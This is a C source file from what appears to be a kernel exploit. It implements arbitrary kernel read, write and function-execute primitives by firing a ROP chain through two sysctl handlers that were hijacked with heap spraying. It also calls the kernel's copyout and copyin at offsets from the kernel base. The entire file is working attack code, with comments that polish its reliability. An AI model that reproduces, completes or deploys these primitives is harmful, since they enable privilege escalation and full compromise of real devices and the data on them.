#include "rwx.h"

#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/sysctl.h>

#include "heap_spray.h"
#include "log.h"
#include "offsets.h"
#define SYSCTL_PREPARE_ROP ("hw.l1dcachesize")
#define SYSCTL_EXECUTE_ROP ("hw.l1icachesize")
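/*
 * Function name: rwx_invoke_hijacked_sysctl
 * Description: Performs one read of the sysctl 'name' whose kernel handler
 *              is expected to have been replaced. Two things are checked:
 *              the read itself must succeed, and the kernel must report an
 *              output size of zero. A non-zero size is what the genuine
 *              handler produces, so it is treated as "our handler is not
 *              installed" rather than as success.
 *              'stage' is only used to word the log line ("preparing" /
 *              "executing").
 * Returns: KERN_SUCCESS, or KERN_ABORTED on either failure.
 */
static kern_return_t rwx_invoke_hijacked_sysctl(const char *name, const char *stage) {
    unsigned long oldp = 0;
    /* Bound the size argument to the buffer we actually hand the kernel
     * instead of a hard-coded 8; identical on the 64-bit target. */
    size_t olds = sizeof(oldp);

    if (sysctlbyname(name, &oldp, &olds, NULL, 0)) {
        /* Capture errno before the logging macro can clobber it. */
        int saved_errno = errno;
        ERROR_LOG("Error %s ROP using %s: %s", stage, name, strerror(saved_errno));
        return KERN_ABORTED;
    }
    if (0 != olds) {
        ERROR_LOG("%s returned a normal size. seems like our sysctl handler wasn't installed.", name);
        return KERN_ABORTED;
    }
    return KERN_SUCCESS;
}

/*
 * Function name: rwx_trigger_handler
 * Description: Calls the overwritten sysctl to execute the ROP chain.
 *              The chain is armed by reading SYSCTL_PREPARE_ROP and fired by
 *              reading SYSCTL_EXECUTE_ROP. Both are ordinary sysctlbyname()
 *              reads from user space, so if the kernel handler was NOT
 *              replaced they are harmless and simply return the real value;
 *              the size check in rwx_invoke_hijacked_sysctl is what detects
 *              that case. The execute step is only attempted once the
 *              prepare step has gone through the hijacked handler.
 * Returns: KERN_SUCCESS when both reads went through the hijacked handler,
 *          KERN_ABORTED otherwise (details are logged).
 */
static kern_return_t rwx_trigger_handler(void) {
    kern_return_t ret = rwx_invoke_hijacked_sysctl(SYSCTL_PREPARE_ROP, "preparing");
    if (KERN_SUCCESS != ret) {
        return ret;
    }
    /* The second log line now says "executing" instead of repeating
     * "preparing", so the two stages can be told apart in the output. */
    return rwx_invoke_hijacked_sysctl(SYSCTL_EXECUTE_ROP, "executing");
}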
/*
 * Function name: rwx_execute
 * Description: Executes a kernel function with controlled parameters.
 *              The target address and its three arguments are staged into
 *              the sprayed buffer the ROP chain consumes, after which the
 *              chain is fired through the hijacked sysctl handler.
 *              NOTE(review): whatever heap_spray_prepare_buffer_for_rop
 *              returns (if anything) is not examined here — confirm it
 *              cannot fail, or check it.
 * Returns: kern_return_t — the status of rwx_trigger_handler(), i.e.
 *          KERN_SUCCESS when the chain was triggered, KERN_ABORTED otherwise.
 */
kern_return_t rwx_execute(void * func_addr, unsigned long arg0, unsigned long arg1, unsigned long arg2) {
    /* Stage the call: target plus up to three register arguments. */
    heap_spray_prepare_buffer_for_rop(func_addr, arg0, arg1, arg2);

    /* Only the trigger can report failure; hand its status straight back. */
    return rwx_trigger_handler();
}
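/*
 * Function name: rwx_read
 * Description: Reads from a kernel address 'addr' into 'value', 'length' bytes.
 *              Implemented by executing the kernel's own copyout() through
 *              rwx_execute with (kernel source, user destination, length);
 *              the argument order matches copyout's signature.
 *              'value' must point to at least 'length' writable bytes in
 *              the calling process — nothing here bounds the copy beyond
 *              the length the caller supplies. A NULL 'value' is rejected
 *              up front: a copyout to a NULL user address cannot succeed,
 *              and skipping it avoids spending a ROP trigger on nothing.
 * Returns: KERN_INVALID_ARGUMENT if 'value' is NULL, otherwise the
 *          status of rwx_execute (KERN_SUCCESS / KERN_ABORTED).
 */
kern_return_t rwx_read(void * addr, void * value, size_t length) {
    if (NULL == value) {
        ERROR_LOG("rwx_read: NULL destination buffer (%zu bytes requested)", length);
        return KERN_INVALID_ARGUMENT;
    }

    /* copyout(kaddr, uaddr, len) */
    return rwx_execute(offsets_get_kernel_base() + OFFSET(copyout),
                       (unsigned long)addr,
                       (unsigned long)value,
                       length);
}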
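/*
 * Function name: rwx_write
 * Description: Writes to a kernel address 'addr' from buffer 'value', 'length' bytes.
 *              Implemented by executing the kernel's own copyin() through
 *              rwx_execute with (user source, kernel destination, length);
 *              the argument order matches copyin's signature and is the
 *              mirror image of rwx_read.
 *              'value' must point to at least 'length' readable bytes in
 *              the calling process. A NULL 'value' is rejected up front: a
 *              copyin from a NULL user address cannot succeed, and skipping
 *              it avoids spending a ROP trigger on nothing.
 * Returns: KERN_INVALID_ARGUMENT if 'value' is NULL, otherwise the
 *          status of rwx_execute (KERN_SUCCESS / KERN_ABORTED).
 */
kern_return_t rwx_write(void * addr, void * value, size_t length) {
    if (NULL == value) {
        ERROR_LOG("rwx_write: NULL source buffer (%zu bytes requested)", length);
        return KERN_INVALID_ARGUMENT;
    }

    /* copyin(uaddr, kaddr, len) */
    return rwx_execute(offsets_get_kernel_base() + OFFSET(copyin),
                       (unsigned long)value,
                       (unsigned long)addr,
                       length);
}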